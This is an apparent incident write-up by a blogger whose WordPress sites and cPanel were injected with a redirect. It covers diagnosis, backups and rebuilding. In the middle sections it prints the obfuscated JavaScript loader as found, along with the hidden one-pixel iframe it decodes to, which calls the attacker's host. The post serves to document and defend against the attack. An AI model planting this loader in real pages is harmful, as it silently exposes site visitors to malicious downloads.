Sites and Cpanel Hacked with prevedvsem123.cn Virus

Updated: A Note Before You Read On

I don’t know the source of this virus currently. All I know is that everyone I have talked to so far that has this issue has been on a Layered Tech box, either directly, in the case of Woopra or through resellers. I have not found any other information of it effecting other hosting providers yet.

But I am only stating what I know to be true and trying to help people stop it on their own because god knows that these support desks are going to have their hands fulls.

Issues like this could be the result of third party scripts that run the server and be unconnected to the host itself.

The Purpose of This Post

I starting playing around with the internet right around 1998. I started playing with code and servers about 5 years ago. Anything can be learned in the field. Just use the power of search and follow instructions well. That is all you really have to do if you are required to be tech guy as well as a blogger.

The rest of the post may be boring at times, but it illustrates a troubleshooting process that may be useful for collecting the data you need if the problem becomes more than you can handle.

Use search. Any error message, window title or url can be used to track down the problem on the search engines.

The term I used to track down anything on my issue was “prevedvsem123.cn”, a url the iframe redirected my blogs to. At the time of my search I only found three references:

• Woopra hacked
• A Russian Forum that since had the links removed
• A post on the Mod2Sims forum

How to Protect Your Blog

The Fort Knox method never worked much for me. If you have Fort Knox worthy information outsource it’s storage to someone who knows what they are doing and does it for a lot of people and is insured.

The longer your site is online, the better chance you have of falling prey to any various attack. Most are not targeted and are widespread because they travel with various web apps and addons. You should probably not even consider the question of if. You need to focus on when.

The alternate route is having enough backups to cure you of paranoia. And then going through it once or twice and coming out virtually unscathed. The initial choice that made quick rebuilds possible was a common CMS like Wordpress. The tools I use for this are listed below:

• SyncBack - Freeware to schedule ftp file backup. Not really needed if you build your site on your home computer first and upload from there. But I save the wp-content folder which houses themes, plugins and uploads. I all save wp-config.php. The rest can go. I can replace it with the latest version of Wordpress. This mirror is also backuped regularly onto a portable hard drive using SyncBack.
• The Wordpress Database Backup Plugin - This plugin sends a daily database backup to Gmail.
• Gmail - A buttload of storage makes Gmail a good place to archive things. I can delete all the old mail if I ever get worried.
• Thunderbird - I also store the last week of backups of each of my Wordpress databases in a local Thunderbird folder.

Rebuilding consists of importing your last wordpress backup file into a new database, if needed. This is easily done through phpMyAdmin, but I didn’t have the luxury of that this time. And if you have no idea what PUTTY is, use SQLyog to connect to the remote database.

Install Wordpress for your blog. I always use one-click installs for this part. It is much easier and the updates are usually one click after that. Cpanel has Fantastico and Dreamhost has one-click installs.

Once that is done, upload your ftp backups of the wp-content folder and the wp-config file. A free FTP program like FileZilla will do.

I usually give it an hour. A few times because of host differences, plugins that worked on one server did not work on a new server. And a few times, I couldn’t import the whole mysql backup for one reason or another. But I could see it finished in about 15 minutes

Let them attack and don’t worry about it. You may want to really check your wp-content folder because that would be about the only way into your new installation.

The First Signs of Attack

Three blogs down, but not all the blogs on the server. Two blogs were showing this error:

Fatal error: Call to undefined function require_wp_db()  in wp-settings.php

From what I can tell, an error like this usually happens when a file is missing from a Wordpress installation or it has been edited incorrectly.

The solution: reinstall Wordpress. But the problem was not over. I could see my site, but it was acting strange.

What I Discovered on My Blogs

On random page loads at my blogs, I would get a redirect to:

prevedvsem123.cn/25/getfile.php?f=vispdf

and pop up that tried to open a incorrectly created PDF file.

So I looked at the source. At the very bottom was this:

<script>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?";

var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>

Sometimes once, sometimes twice depending on which blog I was looking at. There was then an extra body and html tag, like the thing was just tacked on the end. I could only find this codes on the page loads that would not redirect, because when it did, I was obviously on another site by the time I had a chance to view the source.

The vispdf part of the url refers to a script that creates pdf files and explains at least the reason why Adobe opened up and told me I had tried to open a file with the wrong extension.

From what I can tell, that script wrote this to the bottom of my page:

<iframe width="1" height="1" frameborder="0" src="http://prevedvsem123.cn/25/index.php">

And Inside Cpanel

I found the same javascript loader inside of my cpanel control panel. I checked the source. It also had been randomly loading the email form mentioned above.

If you followed the link to Woopra, you will find that two commenters jayson and roo mentioned having their sites hosted on Layered Technologies, where my server and Woopra’s server is located. I don’t screw with the directories in my host other than regular web files. And there is no way I could have inadvertantly added javascript to Cpanel. This is out of my hands.

I am not saying that Layered Tech is at fault. Anyone with the same issue using another host chime in. It will help track it down to a possible security flaw in a script.

The Cpanel installation folder is /usr/local/cpanel/. I decided to investigate. Not change anything. Just to see. In that folder I found a file: “ExampleModule.test.html”. The following is the contents of that file. What triggered me to look at it was the date. It was yesterday.

<html>

<cpanel ExampleModule="printfile(/proc/cpuinfo)">

</html><html><body>

<script>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?";

var result = "";

 for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); d

ocument.write(result);

</script></body></html>

Then I started looking at some of the other html files in the folders, but there were a lot of folders. I found the same code at the end of htdocs/index.html. I am not sure where to go from here, but I know I never touched these files and am not sure who could have.

And it hit more than that in cPanel. Currently I cannot access phpMyAdmin and get this error: Parse error: syntax error, unexpected ‘<’ in /usr/local/cpanel/base/3rdparty/phpMyAdmin/libraries/common.lib.php on line 643

This got me thinking and I went to one of my Wordpress installations and found that the footer.php file had been rewritten with the same code at the bottom. Three blogs so far found with the footer of the theme file change in the exact same way. But only the footer and only the active themes.

No clue where to go from here other then to remove what I can from my files and wait it out. I have removed the code from my themes and will watch for anything else. A script had to do some sort of mass appending of this javascript to the end of the files. As far as I know, it is still some where. Layered Technologies and resellers needs to figure out what’s up on their end or I may just have to move to my own server with Dreamhost who I have had a standard account with for a few years now.

And that is what I call a roadblock. They will happen. Many times, two or three at the same time. About the only way to look at it is from the point of view of a stoic. One step at a time. It’s done when it’s done. No need or reason to get angry because that will only slow things down. And approach as an investigator to give you a little bit of the detachment you may need to keep from reminding yourself that you are working on your own livelihood.